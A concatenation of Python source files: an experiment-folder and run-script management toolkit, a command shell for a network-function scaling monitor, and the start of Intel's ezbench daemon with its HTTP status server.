    out_filepath = tb_fs.join_paths([experiment_folderpath, 'run.sh'])
    tb_io.write_textfile(out_filepath, sc_lines, with_newline=True)
    # add run permissions.
    st = os.stat(out_filepath)
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    os.chmod(out_filepath, st.st_mode | exec_bits)
# NOTE: not the perfect way of doing things, but it is a reasonable way for now.
# main_relfilepath is relative to the project folder path.
# entry_folderpath is the place it changes to before executing.
# if code and data folderpaths are provided, they are copied to the exp folder.
# all paths are relative I think that that is what makes most sense.
def create_experiment_folder(
        main_filepath,
        argname_lst,
        argval_lst_lst,
        output_folderpath_argname,
        all_experiments_folderpath,
        readme,
        experiment_name=None,
        # entry_folderpath=None,
        code_folderpath=None,
        # data_folderpath=None,
        capture_output=False,
        profile_run=False):
    """Materialize the on-disk layout of one experiment.

    For each configuration in ``argval_lst_lst`` a ``cfg<i>`` folder is
    created with a ``run.sh`` launcher and a ``config.json`` of resolved
    arguments; a top-level sharded ``run.sh`` is generated at the end.

    :param main_filepath: python file executed by every configuration.
    :param argname_lst: names of the command-line arguments.
    :param argval_lst_lst: one list of argument values per configuration.
    :param output_folderpath_argname: argument name through which each run
        receives its own ``cfg<i>`` folder path.
    :param all_experiments_folderpath: existing parent folder of all
        experiments.
    :param readme: free-form description stored in the experiment config.
    :param experiment_name: optional name; auto-generated when ``None``.
    :param code_folderpath: if given, the code tree is copied into the
        experiment folder and ``main_filepath`` is re-rooted inside it.
    :param capture_output: redirect each run's output to ``output.txt``.
    :param profile_run: profile each run into ``profile.txt``.
    :return: the path of the created experiment folder.
    """
    assert tb_fs.folder_exists(all_experiments_folderpath)
    assert experiment_name is None or (not tb_fs.path_exists(
        tb_fs.join_paths([all_experiments_folderpath, experiment_name])))
    # assert folder_exists(project_folderpath) and file_exists(tb_fs.join_paths([
    #     project_folderpath, main_relfilepath]))

    # create the main folder where things for the experiment will be.
    if experiment_name is None:
        # NOTE(review): get_available_filename is defined elsewhere in this
        # module; presumably it returns an unused "exp<i>" name — confirm.
        experiment_name = get_available_filename(all_experiments_folderpath,
                                                 "exp")
    experiment_folderpath = tb_fs.join_paths(
        [all_experiments_folderpath, experiment_name])
    tb_fs.create_folder(experiment_folderpath)

    # copy the code to the experiment folder.
    if code_folderpath is not None:
        code_foldername = tb_fs.path_last_element(code_folderpath)
        dst_code_fo = tb_fs.join_paths([experiment_folderpath, code_foldername])

        tb_fs.copy_folder(
            code_folderpath,
            dst_code_fo,
            ignore_hidden_files=True,
            ignore_hidden_folders=True,
            ignore_file_exts=['.pyc'])

        # change main_filepath to use that new code.
        main_filepath = tb_fs.join_paths([experiment_folderpath, main_filepath])

    # NOTE: no data copying for now because it often does not make much sense.
    data_folderpath = None  ### TODO: remove later.
    # # copy the code to the experiment folder.
    # if data_folderpath is not None:
    #     data_foldername = path_last_element(data_folderpath)
    #     dst_data_fo = join_paths([experiment_folderpath, data_foldername])
    #     copy_folder(data_folderpath, dst_data_fo,
    #         ignore_hidden_files=True, ignore_hidden_folders=True)

    # write the config for the experiment; the selection names must match the
    # local variable names above exactly.
    tb_io.write_jsonfile(
        tb_ut.subset_dict_via_selection(locals(), [
            'main_filepath', 'argname_lst', 'argval_lst_lst',
            'output_folderpath_argname', 'all_experiments_folderpath', 'readme',
            'experiment_name', 'code_folderpath', 'data_folderpath',
            'capture_output', 'profile_run'
        ]), tb_fs.join_paths([experiment_folderpath, 'config.json']))

    # generate the executables for each configuration; every run additionally
    # receives its own cfg folder through output_folderpath_argname.
    argname_lst = list(argname_lst)
    argname_lst.append(output_folderpath_argname)
    for (i, vs) in enumerate(argval_lst_lst):
        cfg_folderpath = tb_fs.join_paths([experiment_folderpath, "cfg%d" % i])
        tb_fs.create_folder(cfg_folderpath)

        # create the script
        argvalue_lst = list(vs)
        argvalue_lst.append(cfg_folderpath)
        call_args = tb_ut.subset_dict_via_selection(
            locals(), ['argname_lst', 'argvalue_lst', 'main_filepath'])
        call_args['script_filepath'] = tb_fs.join_paths(
            [cfg_folderpath, 'run.sh'])
        if capture_output:
            call_args['output_filepath'] = tb_fs.join_paths(
                [cfg_folderpath, 'output.txt'])
        if profile_run:
            call_args['profile_filepath'] = tb_fs.join_paths(
                [cfg_folderpath, 'profile.txt'])
        create_run_script(**call_args)

        # write a config file for each configuration
        tb_io.write_jsonfile(
            tb_ut.create_dict(argname_lst, argvalue_lst),
            tb_fs.join_paths([cfg_folderpath, 'config.json']))
    # create_runall_script(experiment_folderpath)
    create_runall_script_with_parallelization(experiment_folderpath)
    return experiment_folderpath
### tools for processing the experiments folders once they have finished.
def map_experiment_folder(experiment_folderpath, fn):
    """Apply *fn* to every ``cfg<i>`` subfolder of an experiment.

    :return: ``(paths, results)`` — aligned lists where ``paths[i]`` is the
        path of the i-th configuration folder and ``results[i]`` is
        ``fn(paths[i])``.
    """
    folder_paths = tb_fs.list_folders(
        experiment_folderpath, recursive=False, use_relative_paths=False)
    num_cfgs = len(
        [p for p in folder_paths
         if tb_fs.path_last_element(p).startswith('cfg')])
    cfg_paths = []
    results = []
    for idx in xrange(num_cfgs):
        cfg_path = tb_fs.join_paths([experiment_folderpath, 'cfg%d' % idx])
        # evaluate fn before recording the path, mirroring failure behavior.
        results.append(fn(cfg_path))
        cfg_paths.append(cfg_path)
    return (cfg_paths, results)
def load_experiment_folder(experiment_folderpath,
                           json_filename_lst,
                           abort_if_notexists=True,
                           only_load_if_all_exist=False):
    """Read a set of json files from every configuration folder.

    :param json_filename_lst: filenames to read in each ``cfg*`` folder.
    :param abort_if_notexists: when ``True`` a missing file fails inside
        the json reader; when ``False`` its slot is filled with ``None``.
    :param only_load_if_all_exist: keep only the configurations for which
        every requested file loaded successfully.
    :return: ``(paths, loaded)`` aligned lists.
    """
    def _load_cfg(cfg_path):
        loaded = []
        for json_name in json_filename_lst:
            json_path = tb_fs.join_paths([cfg_path, json_name])
            if (not abort_if_notexists) and (not tb_fs.file_exists(json_path)):
                loaded.append(None)
            else:
                # when aborting is on, a missing file fails in the reader.
                loaded.append(tb_io.read_jsonfile(json_path))
        return loaded

    (ps, rs) = map_experiment_folder(experiment_folderpath, _load_cfg)
    # filter only the ones that loaded all files successfully.
    if only_load_if_all_exist:
        kept = [(p, r) for (p, r) in zip(ps, rs)
                if all(x is not None for x in r)]
        ps = [p for (p, _) in kept]
        rs = [r for (_, r) in kept]
    return (ps, rs)
def generate_config_args(d, ortho=False):
    """Expand a dict of per-argument value lists into concrete configurations.

    :param d: maps an argument name — or a tuple of tied argument names — to
        the list of values it may take.
    :param ortho: selects the expansion helper: ``tb_ut.iter_product`` when
        ``False``, ``tb_ut.iter_ortho_all`` (with index 0 as the pivot) when
        ``True``. NOTE(review): presumably cartesian product vs one-at-a-time
        variation — confirm in ``tb_ut``.
    :return: ``(argname_lst, argval_lst_lst)`` with names sorted and every
        value list permuted to match the sorted names.
    """
    ks = d.keys()
    if not ortho:
        vs_list = tb_ut.iter_product([d[k] for k in ks])
    else:
        vs_list = tb_ut.iter_ortho_all([d[k] for k in ks], [0] * len(ks))

    argval_lst_lst = []
    for vs in vs_list:
        proc_v = []
        # python 2: izip pairs each key with its drawn value lazily.
        for k, v in itertools.izip(ks, vs):
            if isinstance(k, tuple):
                # if it is iterable, unpack v
                if isinstance(v, list) or isinstance(v, tuple):
                    assert len(k) == len(v)
                    proc_v.extend(v)
                # if it is not iterable, repeat a number of times equal
                # to the size of the key.
                else:
                    proc_v.extend([v] * len(k))
            else:
                proc_v.append(v)
        argval_lst_lst.append(proc_v)

    # unpacking if there are multiple tied argname_lst
    argname_lst = []
    for k in ks:
        if isinstance(k, tuple):
            argname_lst.extend(k)
        else:
            argname_lst.append(k)
    # guarantee no repeats.
    assert len(set(argname_lst)) == len(argname_lst)

    # resorting the tuples according to sorting permutation.
    idxs = tb_ra.argsort(argname_lst, [lambda x: x])
    argname_lst = tb_ra.apply_permutation(argname_lst, idxs)
    argval_lst_lst = [
        tb_ra.apply_permutation(vs, idxs) for vs in argval_lst_lst
    ]
    return (argname_lst, argval_lst_lst)
# NOTE: this has been made a bit restrictive, but captures the main functionality
# that it is required to generate the experiments.
def copy_regroup_config_generator(d_gen, d_update):
    """Return a copy of *d_gen* with keys regrouped as directed by *d_update*.

    ``d_update`` maps either a single key of ``d_gen`` or a tuple of its
    keys to a new value list; a tuple key replaces all its member keys with
    one grouped entry whose tuple/list values must match the key's length.

    :raises AssertionError: if a key of ``d_update`` is not in ``d_gen``,
        keys repeat across groups, ``d_gen`` already contains tuple keys,
        or a grouped value's length differs from its key tuple's length.
    """
    # all keys in the regrouping dictionary have to be in the original dict.
    flat_ks = []
    for k in d_update:
        if isinstance(k, tuple):
            assert all([ki in d_gen for ki in k])
            flat_ks.extend(k)
        else:
            assert k in d_gen
            flat_ks.append(k)
    # no tuple keys. NOTE: this can be relaxed by flattening, and reassigning
    # but this is more work.
    assert all([not isinstance(k, tuple) for k in d_gen])
    # no keys that belong to multiple groups.
    assert len(flat_ks) == len(set(flat_ks))
    # regrouping of the dictionary.
    proc_d = dict(d_gen)
    # PORTABILITY: items() behaves identically to iteritems() here and also
    # works under python 3.
    for (k, v) in d_update.items():
        if isinstance(k, tuple):
            # check that the dimensions are consistent: each grouped value
            # must supply one entry per grouped key.
            # BUG FIX: the original tested `isinstance(vi, tuple)` twice, so
            # list values were never length-checked, and it also ran the
            # check for plain string keys where len(k) is the character
            # count of the key name.
            assert all([(not isinstance(vi, (tuple, list))) or
                        len(vi) == len(k) for vi in v])
            # remove the original ungrouped keys.
            # BUG FIX: `map(proc_d.pop, k)` is lazy on python 3 and would
            # never pop; an explicit loop is identical on python 2.
            for ki in k:
                proc_d.pop(ki)
            proc_d[k] = v
        else:
            proc_d[k] = v
    return proc_d
# TODO: perhaps fix the API with regards to kwargs for consistency with
# other examples.
def run_guarded_experiment(experiment_fn, maxmemory_mbs, maxtime_secs,
                           **kwargs):
    """Run *experiment_fn* in a child process, terminating it if it exceeds
    a memory or wall-clock budget.

    :param experiment_fn: callable executed in a separate process with
        ``kwargs`` as keyword arguments.
    :param maxmemory_mbs: memory ceiling in megabytes (as reported by
        ``tb_lg.memory_process`` — presumably resident size; confirm there).
    :param maxtime_secs: wall-clock ceiling in seconds.
    """
    start = time.time()
    p = multiprocessing.Process(target=experiment_fn, kwargs=kwargs)
    p.start()
    while p.is_alive():
        # wake up at most once per second to re-check the budgets.
        p.join(1.0)
        try:
            mbs_p = tb_lg.memory_process(p.pid)
            if mbs_p > maxmemory_mbs:
                print "Limit of %0.2f MB exceeded. Terminating." % maxmemory_mbs
                p.terminate()
            secs_p = time.time() - start
            if secs_p > maxtime_secs:
                print "Limit of %0.2f secs exceeded. Terminating." % maxtime_secs
                p.terminate()
        except psutil.NoSuchProcess:
            # the child may exit between the liveness check and the probe.
            pass
def run_parallel_experiment(experiment_fn, iter_args):
    """Launch one process per argument tuple and wait for all to finish.

    :param experiment_fn: callable run in each child process.
    :param iter_args: iterable of positional-argument tuples, one per run.
    """
    procs = []
    for arg_tuple in iter_args:
        proc = multiprocessing.Process(target=experiment_fn, args=arg_tuple)
        proc.start()
        procs.append(proc)
    # block until every launched process has terminated.
    for proc in procs:
        proc.join()
class ArgsDict:
    """A string-keyed argument dictionary that can be persisted as json."""

    def __init__(self, filepath=None):
        """Start empty, or load the arguments stored at *filepath*."""
        self.d = {}
        if filepath is not None:
            # BUG FIX: the original called _read but discarded its return
            # value, so constructing from a file always yielded an empty
            # dict (compare SummaryDict.__init__, which assigns it).
            self.d = self._read(filepath)

    def set_arg(self, key, val, abort_if_exists=True):
        """Bind *key* to *val*; by default refuse to overwrite a key."""
        assert (not abort_if_exists) or key not in self.d
        # keys must be non-empty strings so the dict serializes to json.
        assert (type(key) == str and len(key) > 0)
        self.d[key] = val

    def write(self, filepath):
        """Persist the arguments to a json file."""
        tb_io.write_jsonfile(self.d, filepath)

    def _read(self, filepath):
        """Load and return the argument dict stored at *filepath*."""
        return tb_io.read_jsonfile(filepath)

    def get_dict(self):
        """Return a shallow copy of the stored arguments."""
        return dict(self.d)
class SummaryDict:
    """Accumulates per-step values into parallel lists, one list per key.

    Optionally enforces that all value lists keep the same length, which is
    convenient when every key is appended once per step.
    """

    def __init__(self, filepath=None, abort_if_different_lengths=False):
        """Start empty, or load a previously written summary from *filepath*."""
        self.abort_if_different_lengths = abort_if_different_lengths
        if filepath is not None:
            self.d = self._read(filepath)
        else:
            self.d = {}
        self._check_consistency()

    def append(self, d):
        """Append one value per key of *d*; keys are created on first use."""
        # PORTABILITY FIX: items()/values() instead of the python-2-only
        # iteritems()/itervalues(); behavior is identical under python 2.
        for k, v in d.items():
            assert type(k) == str and len(k) > 0
            if k not in self.d:
                self.d[k] = []
            self.d[k].append(v)
        self._check_consistency()

    # NOTE: maybe write is not useful
    def write(self, filepath):
        """Persist the summary to a json file."""
        tb_io.write_jsonfile(self.d, filepath)

    def _read(self, filepath):
        """Load and return the summary dict stored at *filepath*."""
        return tb_io.read_jsonfile(filepath)

    def _check_consistency(self):
        # when enabled, all value lists must share a single length.
        assert (not self.abort_if_different_lengths) or (len(
            set([len(v) for v in self.d.values()])) <= 1)

    def get_dict(self):
        """Return a shallow copy of the accumulated summaries."""
        return dict(self.d)
# perhaps also add a meta data json file per item stored.
class MemoManager:
    """On-disk memoization of json-serializable configs to pickled values.

    Each entry is a pair of files in ``folderpath``: ``config-<name>.json``
    and ``value-<name>.pkl``.  The in-memory index maps a canonical json
    dump of the config to the entry's basename and is rebuilt from the
    config files found on disk.
    """

    def __init__(self, folderpath, create_if_notexists=False):
        self.folderpath = folderpath
        # canonical config string -> file basename (no prefix/extension).
        self.key_to_filename = {}
        tb_fs.create_folder(
            folderpath,
            abort_if_exists=False,
            create_parent_folders=create_if_notexists)
        # initialize the memo based on the state of the folder.
        for fpath in tb_fs.list_files(folderpath):
            fname_with_ext = tb_fs.path_last_element(fpath)
            if fname_with_ext.startswith('config-') and fname_with_ext.endswith(
                    '.json'):
                fname = fname_with_ext[len('config-'):-len('.json')]
                config = tb_io.read_jsonfile(fpath)
                key = self._key_from_config(config)
                self.key_to_filename[key] = fname

    def _key_from_config(self, config):
        # sort keys so logically equal configs map to the same key string.
        return json.dumps(config, sort_keys=True)

    def _get_unique_filename(self):
        """Draw random basenames until one is unused on disk."""
        while True:
            # CONSISTENCY FIX: store the basename as a str, matching the
            # names recovered from disk in __init__ (uuid.UUID formatted
            # via %s yields the same text, so generated paths are unchanged).
            filename = str(uuid.uuid4())
            if not tb_fs.file_exists(
                    tb_fs.join_paths(
                        [self.folderpath,
                         "config-%s.json" % filename])):
                return filename

    def _get_filepath(self, filetype, filename, fileext):
        return tb_fs.join_paths(
            [self.folderpath,
             "%s-%s.%s" % (filetype, filename, fileext)])

    def is_available(self, config):
        """Return whether a value is memoized for *config*."""
        key = self._key_from_config(config)
        return key in self.key_to_filename

    def write(self, config, value, abort_if_exists=True):
        """Store *value* for *config*, creating or overwriting its files."""
        key = self._key_from_config(config)
        assert not abort_if_exists or key not in self.key_to_filename
        # if it exists, reuse its filename; otherwise draw a fresh one.
        if key in self.key_to_filename:
            filename = self.key_to_filename[key]
        else:
            filename = self._get_unique_filename()
        config_filepath = self._get_filepath('config', filename, 'json')
        tb_io.write_jsonfile(config, config_filepath)
        value_filepath = self._get_filepath('value', filename, 'pkl')
        tb_io.write_picklefile(value, value_filepath)
        self.key_to_filename[key] = filename

    def read(self, config):
        """Load the memoized value for *config* (KeyError if absent)."""
        key = self._key_from_config(config)
        filename = self.key_to_filename[key]
        value_filepath = self._get_filepath('value', filename, 'pkl')
        return tb_io.read_picklefile(value_filepath)

    def delete_conditionally(self, delete_cond_fn):
        """Delete every entry whose config satisfies *delete_cond_fn*."""
        del_lst = []
        # PORTABILITY FIX: values() instead of the python-2-only
        # itervalues(); identical behavior under python 2.
        for filename in self.key_to_filename.values():
            config_filepath = self._get_filepath('config', filename, 'json')
            config = tb_io.read_jsonfile(config_filepath)
            if delete_cond_fn(config):
                value_filepath = self._get_filepath('value', filename, 'pkl')
                tb_fs.delete_file(config_filepath)
                tb_fs.delete_file(value_filepath)
                del_lst.append(config)
        # remove the configs from the dictionary.
        for config in del_lst:
            key = self._key_from_config(config)
            self.key_to_filename.pop(key)

    def get_configs(self):
        """Load and return the configs of all memoized entries."""
        cfgs = []
        for filename in self.key_to_filename.values():
            d = tb_io.read_jsonfile(
                self._get_filepath('config', filename, 'json'))
            cfgs.append(d)
        return cfgs
|
main.py | #!/usr/bin/env python3
import signal
import threading
import readline
from cmd import Cmd
import d2agent
class Shell(Cmd):
    """Interactive command shell that forwards each command to a d2agent."""

    agent = {}
    prompt = "d2agent> "
    # ASCII-art banner shown when the shell starts; do_* methods are left
    # undocumented on purpose so Cmd's help output is unchanged.
    intro = "".join([
        " _____ \n",
        " / ____| \n",
        "| (___ _ _ ___ __ _ _ __ _____ __\n",
        " \\___ \\| | | / __|/ _` | '_ \\ / _ \\ \\ /\\ / /\n",
        " ____) | |_| \\__ \\ (_| | | | | (_) \\ V V / \n",
        "|_____/ \\__,_|___/\\__,_|_| |_|\\___/ \\_/\\_/ \n",
    ])

    def __init__(self, ag):
        self.agent = ag
        Cmd.__init__(self)

    def emptyline(self):
        # ignore blank input instead of repeating the previous command.
        pass

    def do_quit(self, arg):
        self.agent.cmd_quit()

    def do_vnf(self, arg):
        self.agent.cmd_vnf(arg)

    def do_nfvi(self, arg):
        self.agent.cmd_nfvi(arg)

    def do_thrd(self, arg):
        self.agent.cmd_thrd(arg)

    def do_sys(self, arg):
        self.agent.cmd_sys(arg)
def main():
    """Build the d2agent, register the lab NFVI/VNFs, and start the shell."""
    # swallow Ctrl-C so SIGINT does not kill the agent or the shell thread.
    def cb_sigint(num, frame): pass
    signal.signal(signal.SIGINT, cb_sigint)

    agent = d2agent.d2agent()
    # hand the monitoring callback (defined below) to the agent.
    agent.background_d2monitor = background_d2monitor
    # NOTE(review): host/port are hard-coded for a specific lab setup.
    agent.nfvi_add('nfvi0', 'labnet5.dpdk.ninja', 8888)
    agent.vnf_add('vnf0', 'nfvi0')
    agent.vnf_add('vnf1', 'nfvi0')
    # agent.vnf_d2mon('vnf0', 'on')

    # run the interactive command loop in its own thread.
    shell = threading.Thread(target=Shell(agent).cmdloop, name='shell')
    shell.start()
def background_d2monitor(d2vnfobj, agent):
    """Monitoring loop run in a d2agent worker thread for one VNF.

    Polls the VNF twice per second, calling ``d2.d2out`` when the perf
    measure falls below 90 and ``d2.d2in`` when perf is high and the rx
    rate is low relative to the core count (presumably scale-out/scale-in
    — confirm in ``susanow.d2``).  Progress is appended to
    /tmp/ssn_d2log.log; the loop exits when the owning thread's
    ``running_flag`` is cleared.
    """
    import time
    import math
    import susanow.d2 as d2
    from d2agent import ts
    from d2agent import cast
    from d2agent import myThread
    assert(isinstance(d2vnfobj , d2agent.d2vnf ))
    assert(isinstance(agent , d2agent.d2agent))

    ssn_nfvi = d2vnfobj.nfvi.cast2ssn()
    ssn_vnf = ssn_nfvi.get_vnf(d2vnfobj.name)
    if (ssn_vnf == None):
        print('vnf not found')
        return

    seeds = []
    f = open('/tmp/ssn_d2log.log', 'a')
    f.write('[{}] {} start d2 monitoring\n'.format(ts(), ssn_vnf.name()))
    f.flush()
    while True:
        # stop when the owning myThread clears its running flag.
        cur_thrd = threading.current_thread()
        cast(myThread, cur_thrd)
        if (cur_thrd.running_flag == False): break

        ssn_vnf.sync()
        n_core = ssn_vnf.n_core()
        rxrate = ssn_vnf.rxrate()
        # scale perfred() to 0-100 and clamp at 100.
        perf = math.floor(ssn_vnf.perfred() * 100)
        perf = 100 if (perf>100) else perf
        max_rate = 17000000

        if (perf < 90):
            f.write('[{}] {} d2out\n'.format(ts(), ssn_vnf.name()))
            f.flush()
            d2.d2out(ssn_vnf, ssn_nfvi)
        else:
            if (n_core == 1): pass
            elif (n_core == 2):
                if (perf > 85):
                    if (rxrate < (max_rate*0.3)):
                        f.write('[{}] {} d2in pattern2\n'
                                .format(ts(), ssn_vnf.name()))
                        f.flush()
                        d2.d2in(ssn_vnf, ssn_nfvi)
            elif (n_core == 4):
                if (perf > 85):
                    if (rxrate < (max_rate*0.6)):
                        f.write('[{}] {} d2in pattern1\n'
                                .format(ts(), ssn_vnf.name()))
                        f.flush()
                        d2.d2in(ssn_vnf, ssn_nfvi)

        # NOTE(review): this is a set literal, so element order and duplicate
        # values are lost — a tuple was probably intended; 'seeds' is also
        # never consumed in this function. Confirm before relying on it.
        seed = { ssn_vnf.rxrate(), ssn_vnf.perfred(), ssn_vnf.n_core()}
        seeds.append(seed)
        time.sleep(0.5)

    f.write('[{}] finish d2 monitoring\n'.format(ts()))
    f.flush()
    f.close()
    return
# Script entry point: build the agent and launch the interactive shell thread.
if __name__ == '__main__':
    main()
|
ezbenchd.py | #!/usr/bin/env python3
"""
Copyright (c) 2015, Intel Corporation
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import multiprocessing
import argparse
import signal
import time
import sys
import os
from datetime import datetime
ezbench_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(ezbench_dir, 'python-modules'))
from ezbench.smartezbench import *
from stats import compare_reports
def setup_http_server(bind_ip = "0.0.0.0", port = 8080):
    """Start a threaded HTTP status server for the ezbench reports.

    Serves three URL families for every report in the module-level
    ``sbenches`` dict: ``/file/<report>/<path>`` (files from the report's
    log folder), ``/status/<report>/`` (a rendered status page), and
    ``/mode/<report>/{run,pause}`` (running-mode control with a redirect
    back to the status page).  The server runs in a daemon thread; server
    and thread are stashed on the function object itself
    (``setup_http_server.server`` / ``.server_thread``) so
    ``teardown_htttp_server`` can stop them.
    """
    from mako.template import Template
    import http.server
    import socket
    import threading
    import socketserver

    # Mako template: index page listing all known reports.
    list_template = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ezbenchd: Status page</title>
</head>

<body>
<h1>Ezbenchd: Status page</h1>

<h2>Reports</h2>
<p>Here is the list of available reports</p>
<ul>
% for sbench in sbenches:
<%
    sbench = sbenches[sbench]
    report_name = sbench.report_name
%>
<li>${report_name}: <a href="/file/${report_name}/">report</a>, <a href="/status/${report_name}/">status</a> (${sbench.running_mode().name})</li>
% endfor
</ul>
</body>
</html>
"""

    # Mako template: per-report status page (mode controls, tasks, events).
    status_template = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ezbenchd: Status page</title>
<style>
a.button {
    -webkit-appearance: button;
    -moz-appearance: button;
    appearance: button;

    text-decoration: none;
    color: initial;
    padding: 3px;
}
</style>
</head>

<%
    from datetime import timedelta
    mode = sbench.running_mode().name
    task_cur, task_list, events = sbench.task_info()

    total_time_left = 0
    if task_cur is not None:
        time = task_cur.remaining_time().total_seconds()
        if time > 0:
            total_time_left += time
    if task_list is not None:
        for task in task_list:
            if task is None:
                continue
            time = task.remaining_time().total_seconds()
            if time > 0:
                total_time_left += time
    total_time_left = timedelta(seconds=int(total_time_left))
%>

<body>
<h1>Ezbenchd report '${report_name}'</h1>

<h2>Status</h2>
<p>General information about the report</p>
<table>
<tr><th>Name</th><th>Value</th><th>Actions</th></tr>
<tr><td>Report name</td><td>${report_name}</td><td></td></tr>
<tr><td>Running mode</td><td>${mode}</td><td>
% if mode != "RUN" and mode != "RUNNING":
<a href="/mode/${report_name}/run" class="button">Run</a>
% else:
<a href="/mode/${report_name}/pause" class="button">Pause</a>
% endif
</td></tr>
<tr><td>Log file</td><td></td><td><a href="/file/${report_name}/smartezbench.log" class="button">View</a></td></tr>
</table>

<h2>Tasks</h2>
% if task_cur is not None:
<p>Current task: ${task_cur}</p>
%endif
<p><ul>
% if task_list is not None and len(task_list) > 0:
% for task in task_list:
<li>${task}</li>
% endfor
%elif task_list is not None:
<li>No tasks left</li>
% else:
<li>Unknown task list</li>
% endif
</ul></p>
<p>Total remaining time: ${total_time_left}s</p>

<h2>Events</h2>
<ul>
% if events is not None and len(events) > 0:
% for event in events:
<li>${event}</li>
% endfor
% else:
<li>No events</li>
% endif
</ul>
</body>
</html>
"""

    class CustomHTTPHandler(http.server.SimpleHTTPRequestHandler):
        def parse_request(self, *args, **kwargs):
            # no-op override; kept as a hook point over the base parser.
            return super().parse_request(*args, **kwargs)

        def __serve_file__(self, report_name, filename, content_type = "text/plain"):
            # Stream a file from the report's log folder, refusing any path
            # that resolves outside it (path-traversal guard via realpath).
            msg = "unknown error"

            if not filename:
                filename = "index.html"

            # pick a content type from the extension, defaulting to text.
            content_types = {"html": "text/html", "png": "image/png"}
            extension = os.path.splitext(filename)[1][1:]
            if extension in content_types:
                content_type = content_types[extension]

            chroot_folder = "{}/logs/{}".format(ezbench_dir, report_name)
            path = "{}/{}".format(chroot_folder, filename)
            real_path = os.path.realpath(path)

            if real_path.startswith(chroot_folder):
                try:
                    with open(real_path, 'rb') as f:
                        # determine the size first for the Content-length header.
                        f.seek(0, os.SEEK_END)
                        size = f.tell()
                        f.seek(0, os.SEEK_SET)

                        self.send_response(200)
                        self.send_header("Content-type", content_type)
                        self.send_header("Content-length", size)
                        self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
                        self.send_header("Pragma", "no-cache")
                        self.send_header("Expires", "0")
                        self.end_headers()

                        # stream the body in 1 KiB chunks.
                        while True:
                            data = f.read(1024)
                            if not data:
                                break
                            self.wfile.write(data)
                        return
                except Exception as e:
                    print("WARNING: An exception got raised while reading file '{}': {}".format(real_path, e))
                    msg = "Invalid file name"
                    pass
            else:
                print("WARNING: Tried to serve a file ('{}') outside of our chroot ('{}')".format(real_path, chroot_folder))
                msg = "Invalid path"

            # fall through: report the failure as a 404 with a short message.
            array = str.encode(msg)
            self.send_response(404)
            self.send_header("Content-type", content_type)
            self.send_header("Content-length", len(array))
            self.end_headers()
            self.wfile.write(array)

        def do_GET(self):
            # Routes: /file/<report>/<path>, /status/<report>/,
            # /mode/<report>/{run,pause}; anything else falls back to the
            # report list page.
            response = 200
            loc = ""
            html = ""

            # NOTE(review): 're' is not imported explicitly in this file;
            # presumably it arrives via the smartezbench wildcard import —
            # confirm.
            m = re.search("^/([a-z]+)/(.*)/(.*)$", self.path)
            if m is not None and len(m.groups()) >= 2:
                cmd = m.groups()[0]
                report_name = m.groups()[1]
                args = m.groups()[2]
                if cmd != "" and report_name != "" and report_name in sbenches:
                    if cmd == "file":
                        return self.__serve_file__(report_name, args)
                    elif cmd == "mode" or cmd == "status":
                        sbench = sbenches[report_name]
                        if cmd == "mode":
                            if args == "run":
                                sbench.set_running_mode(RunningMode.RUN)
                                loc = "/status/{}/".format(report_name)
                            elif args == "pause":
                                sbench.set_running_mode(RunningMode.PAUSE)
                                loc = "/status/{}/".format(report_name)
                            else:
                                # NOTE(review): this message is overwritten by
                                # the render below and never reaches the
                                # client — confirm intent.
                                html = "Invalid mode '{}'".format(args)
                        html = Template(status_template).render(sbench=sbench,
                                                                report_name=report_name)
                else:
                    response = 404
                    html = "Report name '{}' does not exist".format(report_name)

            # no route matched and no redirect pending: show the index page.
            if html == "" and loc == "":
                html = Template(list_template).render(sbenches=sbenches)

            if loc != "":
                # NOTE(review): this redirect branch never calls
                # end_headers(), so the response may not be flushed properly
                # — confirm against http.server semantics.
                self.send_response(302)
                self.send_header('Location', loc)
            else:
                # Add a footer
                if response == 200:
                    date = datetime.now().strftime("%A, %d. %B %Y %H:%M:%S")
                    f = "<footer>Autogenerated by Ezbenchd on {}.</footer>".format(date)
                    html += f

                self.send_response(response)
                self.send_header("Content-type", "text/html")
                self.send_header("Content-length", len(html))
                self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
                self.send_header("Pragma", "no-cache")
                self.send_header("Expires", "0")
                self.end_headers()
                self.wfile.write(str.encode(html))

    class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
        pass

    # bind manually so SO_REUSEADDR can be set before the bind happens,
    # letting quick daemon restarts reuse the port.
    server = ThreadedTCPServer((bind_ip, port), CustomHTTPHandler, bind_and_activate=False)
    server.allow_reuse_address = True
    server.server_bind()
    server.server_activate()

